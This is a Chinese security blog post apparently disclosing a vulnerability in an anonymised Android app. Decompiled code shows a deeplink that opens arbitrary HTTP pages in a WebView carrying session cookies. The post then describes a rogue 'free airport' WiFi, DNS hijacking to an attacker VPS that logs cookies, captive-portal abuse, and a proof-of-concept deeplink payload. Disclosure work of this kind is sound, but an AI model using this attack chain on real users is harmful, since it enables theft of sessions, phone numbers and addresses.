记一次某APK的恶意WIFI攻击

拼搏现实的明天。 2022-10-30 16:19 222阅读 0赞

用户接入恶意WIFI即打开某APP，泄露用户cookie，攻击者可以通过token获取用户手机号、收藏、收货地址等

## 漏洞详情 ##

查看manifest.xml有如下deeplink activity

"com.xxxx.client.android.modules.deeplink.ParseDeepLinkActivity" android:noHistory="true" android:theme="@style/Transparent" android:windowSoftInputMode="0x10">
          <intent-filter>
            <action android:name="com.xxxx.client.android.activity.HomeActivity"/>
          </intent-filter>
          <intent-filter>
            <action android:name="android.intent.action.VIEW"/>
            <category android:name="android.intent.category.DEFAULT"/>
            <category android:name="android.intent.category.BROWSABLE"/>
            <data android:scheme="scheme"/>
          </intent-filter>
    </activity>

逆向ParseDeepLinkActivity代码

@Override // android.app.Activity
    public void onCreate(Bundle arg13) {
        String v0;
        e v13;
        Intent v1_2;
        String frompage;
        String v3 = "";
        super.onCreate(arg13);
        if (s.i()) {
            try {
                this.uri = this.getIntent().getData();
                if (this.uri == null) {
                    this.finish();
                    return;
                }
    
                e.e.b.a.n.a.d.b();
                jb.b("CT_TAG", "uri = " + this.uri);
                v3 = this.uri.getQuery();
                if (TextUtils.isEmpty(v3)) {
                    goto label_61;
                } else {
                    this.schemabean = g.SCHEME_GETURLJSON(v3);
                    v3 = this.schemabean;
                    if (((SchemeBean)v3) == null) {
                            goto label_61;
                        }
    
                        boolean v3_1 = TextUtils.isEmpty(this.schemabean.getFrompage());
                        goto label_37;
                    }
    
                    goto label_62;
                }
                catch(Exception v1) {
                    goto label_174;
                }
    ..

会从查询参数中获取并反序列json，得到结构SchemaBean，之后会根据bean的内容进行派发。

if(bean1 != null) {
                    if(g.a(v1, bean1, v6)) {
                        return;
                    }
    
                    String v7_1 = bean.getChannelName();
                    int v8 = -1;
                    switch(v7_1.hashCode()) {
                        case -2034194897: {
                            boolean v7_2 = v7_1.equals("fenlei_detail");
                            if(v7_2) {
                                v8 = 18;
                            }
    
                            break;
                        }
                        case 3322092: {
                            if(v7_1.equals("live")) {
                                v8 = 0;
                            }
    
                            break;
                        }
                        case 1288290882: {
                            if(v7_1.equals("wiki_all_product")) {
                                v8 = 40;
                            }
    
                            break;
                        }
                        case 1843825908: {
                            if(v7_1.equals("taskreward")) {
                                v8 = 23;
                            }
    
                            break;
                        }
                        case 1991869741: {
                            if(v7_1.equals("pinpai_detail")) {
                                v8 = 17;
                            }
    
                            break;
                        }
    ...
    case 3277: {
                            if(v7_1.equals("h5")) {
                                v8 = 60;
                            }
    
                            break;
                        }

渠道非常多，h5表示要打开h5页面，如下代码会通过路由寻找跳转到对应的activity

case 60: {
                            if(("1".equals(bean.getLogin())) && !e.e.b.a.b.c.Ya()) {
                                Ea.a(v1, 0x392FC);
                                return;
                            }
    
                            b v3_19 = e.a().a("path_activity_zdm_web_browser", "group_route_browser");
                            v3_19.putstring("url", bean.getLinkVal());
                            v3_19.putstring("sub_type", "h5");
                            v3_19.putstring("from", e.e.b.a.u.h.a(v6));
                            v3_19.t();
                            goto label_1102;
                        }

逆向路由注册代码，loadInto为路由统一注册接口，找到对应的activity为HybridActivity

public class o implements b {
        @Override  // com.xxxx.android.router.api.e.b
        public void loadInto(Map arg8) {
            arg8.put("path_activity_zdm_web_browser", a.a(e.e.a.c.a.a.a.ACTIVITY, HybridActivity.class, "path_activity_zdm_web_browser", "group_route_browser", null, -1, 0x80000000));
        }
    }

分析HybridActivity的onCreate方法，里面初始化webview并且loadUrl

@Override  // com.xxxx.client.android.base.BaseActivity
        protected void onCreate(Bundle arg5) {
            super.onCreate(arg5);
            this.A = new HybridPresenter(this, this.za(), this.getIntent().getStringExtra("link_type"), this.getIntent().getStringExtra("sub_type"));
            if(com.xxxx.client.android.hybrid.b.a.a.TRANSPARENT == this.P().h()) {
                int v5 = Build.VERSION.SDK_INT;
                if(v5 >= 21) {
                    int v0 = 0x500;
                    if(v5 >= 23 && this.P().l() == 1) {
                        v0 = 0x2500;
                    }
    
                    this.getWindow().getDecorView().setSystemUiVisibility(v0);
                    this.getWindow().setStatusBarColor(ContextCompat.getColor(this.getContext(), 0x106000D));
                }
            }
    
            this.getLifecycle().a(this.A);
            if(2 == this.A.b(this.getIntent())) {
                return;
            }
    
            this.La();
            this.y = this.init_webview();
            this.A.a(this.getIntent());//这里会同步cookie
    }

遍历webview加载的jsBridge，发现并没有什么可利用的js接口，暂且不表。回到上文的同步cookie的代码

public static void syncCookie(String arg1) {
            ia.syncCookie(arg1, false);
        }
    
        public static void syncCookie(String url, boolean arg9) { //arg9固定为false
            if(!TextUtils.isEmpty(url) && ((arg9) || (url.contains(".xxxx.com")))) {
                try {
                    jb.b("Nat: webView.syncCookie.url", url);
                    CookieManager v9 = CookieManager.getInstance();
                    String oldcookie = v9.getCookie(url);
                    if(oldcookie != null) {
                        jb.b("Nat: webView.syncCookie.oldCookie", oldcookie);
                    }
    
                    v9.setAcceptCookie(true);
                    HashMap v2_1 = Na.a(true);
                    if(v2_1 != null) {
                        if(TextUtils.isEmpty(((CharSequence)v2_1.get("sess")))) {
                            v9.setCookie(".xxxx.com", "sess=;");
                        }
    
                        if(TextUtils.isEmpty(((CharSequence)v2_1.get("ab_test")))) {
                            v9.setCookie(".xxxx.com", "ab_test=;");
                        }
    
                        if(ia.isContain_smzdm_com(url)) {
                            Iterator v2_2 = v2_1.entrySet().iterator();
                            while(true) {
                                boolean v3 = v2_2.hasNext();
                                if(!v3) {
                                    break;
                                }
    
                                Object v3_1 = v2_2.next();
                                Map.Entry v3_2 = (Map.Entry)v3_1;
                                v9.setCookie(".yying.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");
                                v9.setCookie(".xxxx.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");
                            }
    
                            v9.setCookie(".xxxx.com", "f=" + Na.a("android"));
                            v9.setCookie(".xxxx.com", "v=" + Na.a("9.9.10"));
                            v9.setCookie(".xxxx.com", "coupon_h5=" + com.xxxx.client.base.utils.b.c().a("coupon_h5") + ";");
                            v9.setCookie("go.xxxx.com", "scene=" + Na.a(Aa.b) + ";");
                        }
                    }
    
                    String v8_1 = v9.getCookie(url);
                    if(v8_1 != null) {
                        jb.b("Nat: webView.syncCookie.newCookie", v8_1);
                        return;
                    }
                }
                catch(Exception v8) {
                    jb.b("Nat: webView.syncCookie failed", v8.toString());
                    return;
                }
            }
    }

以上代码的意义是为.xxxx.com和.yying.com设置cookie，如果URL的域名是其子域名，那么webview在访问该URL时会自动带上cookie。但是并没有校验URL是否为HTTPS，这里可以是HTTP，可以构造DNS劫持。

## 攻击过程 ##

搭建恶意WIFI  
虚拟机安装kali，再通过apt安装hostapd、dnsmasq和nginx，硬件使用USB无线网卡tplink WN722N。  
1、启动热点  
在hostapd.conf设置SSID为SZ Airport Free，无认证，这个名字拿到机场相信一定会有所收获

![图片][cf047998a68511cbe40914a79bc11a33.png]

2、搭建本地DNS  
在dnsmasq.conf中设置DHCP及DNS，将域名a.xxxx.com解析到我的外网VPS，该VPS上设置nginx的access\_log记录cookie。  
3、设置captive-portal-login  
华为手机进行网络评估时，会访问connectivitycheck.platform.hicloud.com。因此配置DNS使connectivitycheck.platform.hicloud.com解析为192.168.1.1，并在192.168.1.1上设置nginx使其返回302：

![图片][47a704df4c0306f5e0a02359743a70d7.png]

并在192.168.1.1/index.html中插入代码使浏览器拉起APP  
POC：  
\{"channelName":"h5","linkVal":"http://a.xxxx.com/jsloop.html"\}  
经过URL编码

[cf047998a68511cbe40914a79bc11a33.png]: /images/20221024/27901cdb28814588ba8fdba68f3ec9a0.png
[47a704df4c0306f5e0a02359743a70d7.png]: /images/20221024/3f33ef3877764a23a8e9e9703e19fe11.png